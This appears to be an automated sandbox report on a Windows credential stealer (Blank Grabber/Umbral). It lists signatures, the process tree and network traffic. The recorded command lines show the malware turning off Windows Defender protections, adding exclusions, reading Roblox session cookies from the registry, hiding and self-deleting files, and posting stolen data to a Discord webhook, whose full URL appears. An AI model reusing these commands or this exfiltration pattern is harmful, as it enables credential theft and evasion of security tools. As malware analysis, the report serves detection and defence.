Windows Analysis Report
saloader.exe

Overview

General Information

Sample name: saloader.exe
Analysis ID: 1565502
MD5: 1e10af7811808fc24065f18535cf1220
SHA1: 65995bcb862aa66988e1bb0dbff75dcac9b400c7
SHA256: e07fd0ac793b06603be164c9ee73465af512cf17bed07614cbcd2a8410f04eed
Tags: exe, user-aachum

Detection

Blank Grabber, Umbral Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Blank Grabber
Yara detected Umbral Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies the hosts file
Self deletion via cmd or bat file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses attrib.exe to hide files
Uses ping.exe to check the status of other devices and networks
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • saloader.exe (PID: 520 cmdline: "C:\Users\user\Desktop\saloader.exe" MD5: 1E10AF7811808FC24065F18535CF1220)
    • attrib.exe (PID: 7256 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\saloader.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • conhost.exe (PID: 7264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7308 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7560 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7636 cmdline: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7840 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8048 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 1352 cmdline: "wmic.exe" os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 2020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7264 cmdline: "wmic.exe" computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7380 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 6652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7444 cmdline: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7696 cmdline: "wmic" path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1920 cmdline: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\saloader.exe" && pause MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 7732 cmdline: ping localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
saloader.exe | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
saloader.exe | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security
saloader.exe | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attempting to enumerate video devices using WMI | ditekSHen
  • 0x31894:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0x31a1a:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0x31ab6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

Source | Rule | Description | Author | Strings
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attempting to enumerate video devices using WMI | ditekSHen
  • 0x31894:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0x31a1a:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0x31ab6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

Source | Rule | Description | Author | Strings
00000000.00000002.1924265199.000002113FA90000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
00000000.00000002.1924265199.000002113F9B4000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.1924265199.000002113F4A5000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
00000000.00000000.1205880732.000002113D642000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
00000000.00000000.1205880732.000002113D642000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security

Source | Rule | Description | Author | Strings
0.0.saloader.exe.2113d640000.0.unpack | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
0.0.saloader.exe.2113d640000.0.unpack | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security
0.0.saloader.exe.2113d640000.0.unpack | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attempting to enumerate video devices using WMI | ditekSHen
  • 0x31894:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0x31a1a:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0x31ab6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

                        System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\saloader.exe", ParentImage: C:\Users\user\Desktop\saloader.exe, ParentProcessId: 520, ParentProcessName: saloader.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe', ProcessId: 7308, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\saloader.exe", ParentImage: C:\Users\user\Desktop\saloader.exe, ParentProcessId: 520, ParentProcessName: saloader.exe, ProcessCommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, ProcessId: 7636, ProcessName: powershell.exe
Source: Threat created | Author: Perez Diego (@darkquassar), oscd.community | Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 7264, StartAddress: 2B6F32B0, TargetImage: C:\Windows\System32\conhost.exe, TargetProcessId: 7264
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\saloader.exe, ProcessId: 520, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\FRc7Z.scr
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\saloader.exe", ParentImage: C:\Users\user\Desktop\saloader.exe, ParentProcessId: 520, ParentProcessName: saloader.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe', ProcessId: 7308, ProcessName: powershell.exe
Source: File created | Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io | Data: EventID: 11, Image: C:\Users\user\Desktop\saloader.exe, ProcessId: 520, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\FRc7Z.scr
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\saloader.exe, ProcessId: 520, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\FRc7Z.scr
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Users\user\Desktop\saloader.exe, ProcessId: 520, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\FRc7Z.scr
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\saloader.exe", ParentImage: C:\Users\user\Desktop\saloader.exe, ParentProcessId: 520, ParentProcessName: saloader.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe', ProcessId: 7308, ProcessName: powershell.exe
No Suricata rule has matched

                        AV Detection

Source: saloader.exe | Avira: detected
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr | Avira: detection malicious, Label: HEUR/AGEN.1307507
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr | ReversingLabs: Detection: 78%
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr | Virustotal: Detection: 81%
Source: saloader.exe | ReversingLabs: Detection: 78%
Source: saloader.exe | Virustotal: Detection: 75%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.7% probability
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr | Joe Sandbox ML: detected
Source: saloader.exe | Joe Sandbox ML: detected
Source: saloader.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.7:49813 version: TLS 1.2
Source: saloader.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Networking

Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost
Source: global traffic | HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: ip-api.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: discordapp.com
Source: unknown | HTTP traffic detected: POST /api/webhooks/1310580388070031360/HcT5cAwFckSLk1OKu346uVDw7gzPyJJvcWmU8BKJrBQSUsE3Q1GCqDtVn5MK3JlldJBn HTTP/1.1 | Accept: application/json | User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17 | Content-Type: application/json; charset=utf-8 | Host: discordapp.com | Content-Length: 939 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 30 Nov 2024 01:30:03 GMT | Content-Type: application/json | Content-Length: 45 | Connection: close | Cache-Control: public, max-age=3600, s-maxage=3600 | strict-transport-security: max-age=31536000; includeSubDomains | x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f | x-ratelimit-limit: 5 | x-ratelimit-remaining: 4 | x-ratelimit-reset: 1732930205 | x-ratelimit-reset-after: 1 | via: 1.1 google | alt-svc: h3=":443"; ma=86400 | CF-Cache-Status: DYNAMIC | Set-Cookie: __cf_bm=BX4kI7Aq45FoNWq_RPBuj0TQviwCVhF8WSsGHJmfl.Y-1732930203-1.0.1.1-naczNhouxrOVdJppKEeMAwYsDG3xslKJi8usFy1ZtObLvPTpsTP6.RSLJkVGTsXd6GPQa3NRVGZ1aPdUt4lQWg; path=/; expires=Sat, 30-Nov-24 02:00:03 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=utAiGLH4w22T4tKlph09QoYkB6UjvXL1X0iPPTk8YlHoVtxpSjvd7wmzHfXezhS7tdN9HCXx2UqgbRHMyWmRuNlUbsg43h9RkA2WfHiQegZWiWRcWK9Mm9OpVJoicj9H"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Set-Cookie: __cfruid=5426df9ee3509d1e165b7f3abf3be05aea69702d-1732930203; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None | Set-Cookie: _cfuvid=_FNztmRJ4OKeKfK7xSTIvQ4CxD40lHLgPDhYVb9W09g-1732930203983-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 30 Nov 2024 01:30:07 GMT | Content-Type: application/json | Content-Length: 45 | Connection: close | Cache-Control: public, max-age=3600, s-maxage=3600 | strict-transport-security: max-age=31536000; includeSubDomains | x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f | x-ratelimit-limit: 5 | x-ratelimit-remaining: 4 | x-ratelimit-reset: 1732930208 | x-ratelimit-reset-after: 1 | via: 1.1 google | alt-svc: h3=":443"; ma=86400 | CF-Cache-Status: DYNAMIC | Set-Cookie: __cf_bm=aXbYGK.h78xwK59Y3zvJtf8zZItkbtguGaqrufqS5Dw-1732930207-1.0.1.1-PmG8kOKKAkIVtb4wQ0WSuJVmklrn60FZyzlev6m7NQ6A166jfFJVicTpcOJvPP3KlsQcjVCpiHSFRjvPTRfNQQ; path=/; expires=Sat, 30-Nov-24 02:00:07 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=beVAM5BjnHJt4qYaBI7LVhsVatipCKIM7pkCxp3X2gpGcCB0rZLBaoUrHxdXCes%2FRqecfMqNxp3Nm4HTgWTmrnOuLZuINeodq5dszGmQ4Z4Um0mc%2FC525Ckt0Nn8qwFJ"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8ea711f969ac7cb1-EWR | Body: {"message": "Unknown Webhook", "code": 10015}
Source: powershell.exe, 00000013.00000002.1625690847.0000021A7E6B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microso
Source: powershell.exe, 00000013.00000002.1629506209.0000021A7EABE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoe
Source: saloader.exe, 00000000.00000002.1924265199.000002113F4CA000.00000004.00000800.00020000.00000000.sdmp, saloader.exe, 00000000.00000002.1924265199.000002113FAAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://discordapp.com
Source: saloader.exe, 00000000.00000002.1924265199.000002113FA0F000.00000004.00000800.00020000.00000000.sdmp, saloader.exe, 00000000.00000002.1924265199.000002113F9C8000.00000004.00000800.00020000.00000000.sdmp, saloader.exe, 00000000.00000002.1924265199.000002113F3F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: saloader.exe, 00000000.00000002.1924265199.000002113F9E5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/json/?fiel
Source: saloader.exe, FRc7Z.scr.0.dr | String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: saloader.exe, FRc7Z.scr.0.dr | String found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
Source: powershell.exe, 00000009.00000002.1345053621.0000022DA6793000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1470021049.0000022F1160E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1408003898.0000022F02E5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1470021049.0000022F11745000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1609155447.0000021A101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1609155447.0000021A1007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1502342248.0000021A019B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1827384470.00000218E5A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1827384470.00000218E58FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1699129988.00000218D7148000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001B.00000002.1699129988.00000218D5AB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000009.00000002.1322027586.0000022D96949000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: saloader.exe, 00000000.00000002.1924265199.000002113F391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1322027586.0000022D96721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1364642205.000002520E6A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1408003898.0000022F01591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1502342248.0000021A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1699129988.00000218D5881000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.1322027586.0000022D96949000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000011.00000002.1408003898.0000022F02D90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1502342248.0000021A0179B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1699129988.00000218D6D1E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000001B.00000002.1699129988.00000218D5AB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000009.00000002.1352472499.0000022DAEEFF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000013.00000002.1629506209.0000021A7EABE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co9
Source: powershell.exe, 00000009.00000002.1322027586.0000022D96721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1364642205.000002520E6A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1364642205.000002520E6C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1408003898.0000022F01591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1502342248.0000021A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1699129988.00000218D5881000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000001B.00000002.1699129988.00000218D7148000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001B.00000002.1699129988.00000218D7148000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001B.00000002.1699129988.00000218D7148000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: FRc7Z.scr.0.dr | String found in binary or memory: https://discord.com/api/v10/users/
Source: saloader.exe, 00000000.00000002.1924265199.000002113F4CA000.00000004.00000800.00020000.00000000.sdmp, saloader.exe, 00000000.00000002.1924265199.000002113F4A5000.00000004.00000800.00020000.00000000.sdmp, saloader.exe, 00000000.00000002.1924265199.000002113FAAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discordapp.com
Source: saloader.exe, FRc7Z.scr.0.dr | String found in binary or memory: https://discordapp.com/api/v9/users/
Source: saloader.exe, 00000000.00000002.1924265199.000002113F4CA000.00000004.00000800.00020000.00000000.sdmp, saloader.exe, 00000000.00000002.1924265199.000002113FA90000.00000004.00000800.00020000.00000000.sdmp, saloader.exe, 00000000.00000002.1924265199.000002113F391000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discordapp.com/api/webhooks/1310580388070031360/HcT5cAwFckSLk1OKu346uVDw7gzPyJJvcWmU8BKJrBQS
Source: saloader.exe, 00000000.00000002.1924265199.000002113FA90000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Blank-c/Umbral-Ste
Source: FRc7Z.scr.0.dr | String found in binary or memory: https://github.com/Blank-c/Umbral-Stealer
Source: saloader.exe, 00000000.00000002.1924265199.000002113FA90000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Blank-c/Umbral-Stealerx#
Source: powershell.exe, 0000001B.00000002.1699129988.00000218D5AB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: saloader.exe, 00000000.00000002.1924265199.000002113F391000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gstatic.com
Source: saloader.exe, 00000000.00000002.1924265199.000002113F391000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gstatic.com/generate_204
Source: saloader.exe, FRc7Z.scr.0.dr | String found in binary or memory: https://gstatic.com/generate_204e==================Umbral
Source: powershell.exe, 00000009.00000002.1345053621.0000022DA6793000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1470021049.0000022F1160E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1408003898.0000022F02E5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1470021049.0000022F11745000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1609155447.0000021A101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1609155447.0000021A1007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1502342248.0000021A019B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1827384470.00000218E5A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1827384470.00000218E58FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1699129988.00000218D7148000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
